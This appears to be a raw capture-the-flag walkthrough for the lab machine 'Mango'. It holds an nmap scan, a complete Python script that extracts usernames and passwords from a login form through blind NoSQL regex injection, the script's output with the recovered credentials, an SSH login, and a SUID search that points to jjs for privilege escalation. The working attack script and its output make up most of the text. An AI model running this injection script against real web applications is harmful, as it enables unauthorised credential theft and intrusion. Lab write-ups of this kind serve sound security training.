


oot@kali:~# nmap -A -T4 -p- 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 23:52 EDT
Nmap scan report for 10.10.10.162
Host is up (0.25s latency).
Not shown: 65453 closed ports, 79 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: ERROR: Script execution failed (use -d to debug)
| tls-alpn: 
|_  http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/3%OT=22%CT=1%CU=42803%PV=Y%DS=2%DC=T%G=Y%TM=5E86B75E
OS:%P=i686-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS(O1
OS:=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW
OS:7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=
OS:Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R
OS:D=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%
OS:O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=4
OS:0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   276.96 ms 10.10.14.1
2   277.91 ms 10.10.10.162

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1093.32 seconds


// check https://10.10.10.162 , dirb + burpsuit to scan this address, check every possaible. but nothing vauleable

// check this "ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN"
// vim /etc/hosts to targe 10.10.10.162 staging-order.mango.htb
// check http://staging-order.mango.htb, found a login page, use dirb + burpsuit. 
// burp password by using this script

############################## mango.py###############

import string
import requests

url = "http://staging-order.mango.htb/index.php"
headers = {"Host": "staging-order.mango.htb"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\" + c  for c in string.punctuation]

def main():
    usernames = get_users()
    if usernames:
        print('Finished!')
        for username in usernames:
            password = get_password(username)
            print('{}:{}'.format(username, password))
    else:
        print('Not Found!')

def get_users():
    usernames = []
    payload = {"username[$regex]":"","password[$regex]":".*", "login":"login"}

    for c in possible_chars:
        username = "^" + c
        payload["username[$regex]"] = username + ".*"
        r = requests.post(url, data=payload, headers=headers, allow_redirects=False)
        if r.status_code == 302:
            print("username start with character:" + c)
            for x in range(0, get_username_length() - 1):
                for c2 in possible_chars:
                    payload["username[$regex]"] = username + c2 + ".*"
                    r2 = requests.post(url, data=payload, headers=headers, allow_redirects=False)
                    if r2.status_code == 302:
                        username += c2
                        print(username[1:])
                        break
                #if c2 == possible_chars[-1]:
            print("Found username: {}".format(username[1:]))
            usernames.append(username[1:])

    return usernames

def get_password(username):
    payload = {"username": username, "password[$regex]": "", "login": "login"}
    password = "^"
    
    for x in range(0, get_pass_length(username)):
        for c in possible_chars:
            payload["password[$regex]"] = password + c + ".*"
            r = requests.post(url, data=payload, headers=headers, allow_redirects=False)
            if r.status_code == 302:
                password += c
                print(password[1:])
                break
    password = password[1:].replace("\\", "")
    print("Found {}'s password: ".format(username) + password)
    return password

def get_username_length():
    length = 1
    while True:
        payload = {"username[$regex]": ".{{{}}}".format(length), "password[$ne]":"", "login":"login"}
        r =requests.post(url, data=payload, headers=headers, allow_redirects=False)
        if r.status_code == 302:
            length += 1
        else:
            return length -1

def get_pass_length(username):
    length = 1
    while True:
        payload = {"username": username, "password[$regex]": ".{{{}}}".format(length), "login": "login"}
        r = requests.post(url, data=payload, headers=headers, allow_redirects=False)
        if r.status_code == 302:
            length += 1
        else:
            return length -1

if __name__ == '__main__':
    main()

#############################################

// or you can using burpsuit to cracking the password

root@kali:~# python mango.py 
username start with character:a
ad
adm
admi
admin
Found username: admin
username start with character:m
ma
man
mang
mango
Found username: mango
Finished!
t
t9
t9K
t9Kc
t9KcS
t9KcS3
t9KcS3\>
t9KcS3\>\!
t9KcS3\>\!0
t9KcS3\>\!0B
t9KcS3\>\!0B\#
t9KcS3\>\!0B\#2
Found admin's password: t9KcS3>!0B#2
admin:t9KcS3>!0B#2
h
h3
h3m
h3mX
h3mXK
h3mXK8
h3mXK8R
h3mXK8Rh
h3mXK8RhU
h3mXK8RhU\~
h3mXK8RhU\~f
h3mXK8RhU\~f\{
h3mXK8RhU\~f\{\]
h3mXK8RhU\~f\{\]f
h3mXK8RhU\~f\{\]f5
h3mXK8RhU\~f\{\]f5H
Found mango's password: h3mXK8RhU~f{]f5H
mango:h3mXK8RhU~f{]f5H
root@kali:~# 
root@kali:~# 
root@kali:~# 
root@kali:~# ssh admin@10.10.10.162
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ECDSA) to the list of known hosts.
admin@10.10.10.162's password: 
Permission denied, please try again.
admin@10.10.10.162's password: 

root@kali:~# ssh mango@10.10.10.162
mango@10.10.10.162's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Apr  3 07:26:49 UTC 2020

  System load:  0.01               Processes:            103
  Usage of /:   26.3% of 19.56GB   Users logged in:      1
  Memory usage: 16%                IP address for ens33: 10.10.10.162
  Swap usage:   3%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Apr  3 06:14:28 2020 from 10.10.14.28
mango@mango:~$ 

mango@mango:~$ bash l.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled

mango@mango:~$ find / -user root -perm -4000 2>/dev/null
/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
mango@mango:~$ 

// found "/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs"     
// refer: https://gtfobins.github.io/gtfobins/jjs/


